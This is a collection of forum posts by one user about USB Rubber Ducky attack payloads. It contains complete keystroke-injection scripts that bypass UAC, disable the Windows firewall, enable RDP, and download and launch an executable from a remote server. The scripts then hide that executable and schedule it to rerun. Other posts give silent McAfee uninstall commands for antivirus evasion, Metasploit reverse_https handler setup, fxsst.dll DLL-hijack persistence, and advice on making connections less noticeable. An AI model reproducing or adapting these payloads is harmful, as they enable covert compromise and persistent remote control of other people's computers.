TeCHemically
-
Posts
131 -
Joined
-
Last visited
Posts posted by TeCHemically
-
-
Correct, except only one windows on the 4th line.
set PAYLOAD windows/x64/meterpreter/reverse_https
Keep in mind, that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https, doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious - best to pick something that will blend in with the other network traffic (at least as long as ports are concerned)).
I started the 32 bit listener and created the fxsst.dll with a 32bit reverse_https payload. When it runs I get the following on my listening machine:
Starting the payload handler...
[*] <IP address>:5465 Request received for /JuQL...
[*] <IP address>:5465 Staging connection for target /JuQL received...
[*] Patched user-agent at offset 657384...
[*] Patched transport at offset 657044...
[*] Patched URL at offset 657112...
[*] Patched Expiration Timeout at offset 657868...
[*] Patched Communication Timeout at offset 657984...
[*] Meterpreter session 1 opened (<IP address>:443 -> <IP address>:5465) at 2013-10-04 13:47:46 -0500
[-] Failed to load extension: No response was received to the core_loadlib request.
-
Very nice! I am having issues though. When the powershell command is entered a ton of red text flies by and the window disappears. No shell results. Sorry I don't have more information. Any help and direction is appreciated!
-
After further testing it appears as though the SD cards have been somehow corrupted or damaged by the twin ducky. I reflashed the firmware and got not change. I checked the SD cards on 2 other PCs (one linux one windows) and on the windows PC I got "I/O" errors in the pop up dialog box. I am always "safely removing" the mounted storage before I take it out of the PC I am working on. Has anyone else had SD corruption issues with the twin duck? Thanks to all who reply! :)
Ok, after further testing this seems to be begin caused by read write errors likely associated with the ducky drive not unmounting correctly. No matter if I dismount from windows explorer or the system tray, it still stays visible and navigable in the windows explorer window. I have told it to dismount from the explorer window and the system tray many times and it always throws up the "safe to remove" balloon; but alas, once I do remove it I get alternating fast and slow red clinking and not drive mount or code execution on the twin duck whenever it is inserted into any client. I have reflashed the firmware to no avail. Is any one else having these SD card corruption/dismount errors?
EDIT: putting the "inject.bin" file on the root with 2 other file folders causes this thing to fail. If I remove the inject.bin I am able to mount ducky storage. So with any payload on it the thing totally fails. With no payload the storage will mount. If I have the payload there but named incorrectly then I still have access to the storage. I am only seeing this failure now with the payload on the root of the SD named properly (inject.bin).
-
I am very interested in this as well. I was looking at scriptjunkie's article "Why Encoding Does not Matter and How Metasploit Generates EXEs" and was wondering how I could implement the c output of my custom shellcode into a custom or pre-existing exe. Any resources and/or advice is greatly appreciated!
-
scriptjunkie detailed this type of thing in an article on his site called "Why Encoding Does not Matter and How Metasploit Generates EXEs". So, should I attempt to modify an existing exe or is is simpler to create my own for this purpose?
-
I used msfvenom and it gave me the output of my custom shellcode. How difficult is it to implement that into a custom exe/ exe template that I can use for AV evasion? I have a thread on this started under security if you could shed some light that would be amazing, thanks for all your help! :)If msfvenom isn't working for you, then piping msfpayload into msfencode is still fine. It's what everyone did before msfvenom was released.
-
I would like to know if there is a way to generate random exe templates for injecting custom shellcode into; just like msf pro does. Is there a manual way to do this? If not, where can I find the information I will need to write my own? I am not a programmer so this will need to be VERY good instruction for me to be able to follow. I am willing to learn but I am very inexperienced here. I basically need to be able to create my own custom/random exe template then know how to add the custom shellcode into it that is created by msfvenom's output so that it runs. Thanks to all who help!
-
Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!
~skysploit
So, I have to ask. Since you have "I remember" playing on that vid. Do you recognize my avatar?
-
Try modifying the payload and use dbd. DBD uses an SSL connection and is pretty darn good at bypassing AV without having to obfuscate at all. Not only that the size of the payload itself is tiny... I am currently working on a new version of the simple-ducky and it should be ready in the next couple of weeks. Great job TeCHemically!
~skysploit
Beautiful, great work man! I just watched your vid. You have yourself another subscriber.
-
You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D
I am having issues with msfvenom though. Using msfpayload and piping into msfencode worked to create the aforementioned dll but I don't see the options I need in the help of msfvenom.
-
Correct, except only one windows on the 4th line.
set PAYLOAD windows/x64/meterpreter/reverse_https
Keep in mind, that if you're in Linux and not root, you cannot bind to port 443. Just because you use reverse_https, doesn't mean you have to use 443. You can still use any port you like. (Although outward connections over 443 are a lot less suspicious - best to pick something that will blend in with the other network traffic (at least as long as ports are concerned)).
Great, thanks so much! :D
-
So to start the handler would I use the following:
use exploit/multi/handler
set LHOST 0.0.0.0
set LPORT 443
set PAYLOAD windows/windows/x64/meterpreter/reverse_https
set ExitOnSession false
exploit -j -
You can't run a 64-Bit executable on a 32-Bit machine, but you can do it the other way. (x86 Meterpreter works on x86 and x64 architectures, but x86 detection rate is A LOT higher than 64-Bit)
The x86 Meterpreter reverse http sis here:
payload/windows/meterpreter/reverse_https (The one I expect you used)
The x64 one is here
payload/windows/x64/meterpreter/reverse_https
Also, try and use msfvenom for generating payloads, it's a combination of msfpayload and msfencode.
You are quite right about everything you said. Thank you for your help; you have been a HUGE blessing! :D
-
After further testing it appears as though the SD cards have been somehow corrupted or damaged by the twin ducky. I reflashed the firmware and got not change. I checked the SD cards on 2 other PCs (one linux one windows) and on the windows PC I got "I/O" errors in the pop up dialog box. I am always "safely removing" the mounted storage before I take it out of the PC I am working on. Has anyone else had SD corruption issues with the twin duck? Thanks to all who reply! :)
-
I am also having issues with Twin Duck original firmware. It has been functional through my testing today but just about a half hour ago the DUCKY storage drive no longer mounts and the inject.bin does not run either. Tried on 2 PCs. I get an alternating fast and slow red LED flashing on one PC and I get no lights at all on the other. The storage will mount if I put the SD card in another reader.
-
I found the following little tid bit that has been of great use in corporate environments. Simply adding the appropriate line toward the top of your ducky script (or adding them all just in case works too) can significantly decrease AV detection (considering it removes it from the equation!) :D
VirusScan Enterprise (VSE) command line removal using msiexec.exe:
- Click Start, Run.
- Type the removal string for your version of VSE, then click OK.
VirusScan Enterprise 8.8
msiexec /x {CE15D1B6-19B6-4D4D-8F43-CF5D2C3356FF} REMOVE=ALL REBOOT=R /qVirusScan Enterprise 8.7i
msiexec /x {147BCE03-C0F1-4C9F-8157-6A89B6D2D973} REMOVE=ALL REBOOT=R /qVirusScan Enterprise 8.5i
msiexec.exe /x {35C03C04-3F1F-42C2-A989-A757EE691F65} REMOVE=ALL REBOOT=R /q
VirusScan Enterprise 8.0i
msiexec.exe /x {5DF3D1BB-894E-4DCD-8275-159AC9829B43} REMOVE=ALL REBOOT=R /q
Switches that you can use with msiexec.exe:
/q The quiet switch ensures the removal is done silently - nothing is displayed. /x This switch will automatically remove an installation. /iThis switch will communicate via the UI (User Interface) and is used to Repair, Remove, or Modify an installation./? This switch provides additional information on all msiexec.exe command switches. -
Does your version minimize the terminal upon execution and then close the terminal when it's done?
No, but that section could be easily added to the top. Good idea :)
-
Well, to start, tunnelling anything over SSL is a great start. Have a look into Meterpreter in metasploit. The 64-bit https Meterpreter even as a binary will pretty much never being detected by an AV.
As far as persistence goes, the startup folder is one way, but is usually picked up by AV.
Or put Meterpreter into a dll file and call it "fxsst.dll" and through it into C:\Windows. Windows automatically tries to load this dll on startup as part of the "Windows Picture and Fax" service.
Thanks for the help! :) Can the 64bit https meterpreter shell run on a 32 bit machine? Also, I generated the above mentioned dll via msfconsole but the command I used just allowed me to specify https. Is this created 64 bit by default or is there a part of the command I missed that will create the 64 bit shell? Thanks again, this is a great method!
-
This is great, but it would be wise to keep in mind that this is a very LOUD form of persistence. If you're running this on a network, then you need to be aware of any network admins that may be watching outgoing connections or just block all inbound rdp connections at the firewall level.
Thanks for the feedback! :) Are there any other ways for a persistent method that is quieter? How could one go about dropping a persistent reverse shell without the resulting connetion being so noticable? I try to make sure my listener is on a common port so it can get through the network firewall and it is working on the corporate network I have available for testing currently. Any guidance is appreciated, thakns again!
-
Ok, I added a bit more to make persistence truly persistent. This now changes the attributes of the winmgmt.exe file to a hidden system file so it is not ordinarily visible. It also creates a scheduled task to run this every 2 hours in case connection is lost. If this task has already been run in the past it will replace the scheduled task with the name "Management".
DELAY 5000
ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
ALT Y
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
ENTER
DELAY 300
STRING attrib +H +S "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe"
ENTER
DELAY 300
STRING schtasks /create /tn Management /tr "%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe" /sc hourly /mo 2
ENTER
DELAY 300
STRING y
ENTER
STRING exit
ENTER -
This is a simple modification to the powershell reverse payload w/UAC for Win7 in simple-ducky to make it persistent. All credit goes to Skysploit for this payload! I added the quicker UAC bypass method and edited the location that the EXE is placed for persistence. Verified system privileges after log off and reboots! :D
******************************************************************************************************************************
DELAY 5000
ESCAPE
DELAY 400
CONTROL ESCAPE
DELAY 400
STRING cmd
DELAY 400
MENU
DELAY 400
STRING a
DELAY 700
ALT Y
DELAY 800
ENTER
STRING netsh firewall set opmode disable
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
ENTER
DELAY 300
STRING reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f
ENTER
DELAY 300
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://<server_name>/winmgmt.txt','%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\winmgmt.exe'); Start-Process "'%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\winmgmt.exe'"
ENTER
STRING exit
ENTER******************************************************************************************************************************
You MUST use simple-ducky by Skysploit to generate this payload and place the winmgmt.txt file in your webserver location. After you have gone through creating the payload simply delete the created "inject.bin" file and open the "payload.txt" file for editing. Delete all text and paste in the payload code above.
Then in terminal type the following 2 commands:
cd /usr/share/ducky/encoder
(for Kali, if using a different OS then cd to the directory your "encoder.jar" file is in)
java -jar encoder.jar -i payload.txt -o inject.bin
(now place the "inject.bin" file on your ducky and use as you normally would)
-
Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.
Everything appears to have been successful on the client side; but I dont get the shell on my VPS. I am using other 443 meterpreter reverse shells in the same environment successfully so I know it is not a network issue.
EDIT: re-ran everything and now all is well. Great job!! If only there was a way to make this persistent.
-
Hey thanks for trying it out. I have updated the script to support default Kali install. If you are still having issues please let me know.
No, thank you for taking the time to produce this! I ran it this morning and all appears well. What directory does the txt file get created in?...Nevermind, I found it in home directory. Thanks again! :)
-
Great script, I am super excited to test this one out :D
One problem though for me so far. Just like overwraith's issue. I have metasploit fully updated as of less than 5 mintues ago from the time of this post and have postgresql and metasploit services started. I am still getting the below error:
[*] Generating shellcode
/root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in ``': No such file or directory - /opt/metasploit-framework/./msfvenom --payload windows/meterpreter/reverse_tcp LHOST=71.81.200.174 LPORT=443 C (Errno::ENOENT)
from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:44:in `shellcode_gen'
from /root/Powershell-Reverse-Rubber-Ducky-master/reverse_powershell_ducky.rb:83:in `<main>'Do I need to have the msfconsole up? Why am I getting this error? Thanks to all who reply! :)
[Payload] Persistent powershell reverse payload with UAC on Win7
in Classic USB Rubber Ducky
Posted
Tried it again and I get the following. It is acting like the shell is there but I cannot interact at all. In fact the shell is acting like it is on the perimeter not the host behind the public IP. I usually see the public IP then the internal host when I use reverse_tcp. In this method I get the shell functioning and on the internal client PC. Does the reverse_https payload require something else? Is it not pulling down the stage? Does this payload behave differently than reverse_tcp?
exploit(handler) > exploit -j [*] Exploit running as background job.
[*] Starting the payload handler... [*] <Public IP address>:60476 Request received for /JuQL... [*] <Public IP address>:60476 Staging connection for target /JuQL received... [*] Patched user-agent at offset 657384... [*] Patched transport at offset 657044... [*] Patched URL at offset 657112... [*] Patched Expiration Timeout at offset 657868... [*] Patched Communication Timeout at offset 657984... [*] Meterpreter session 1 opened (<IP address>:443 -> <Public IP address>:60476) at 2013-10-04 17:21:11 -0500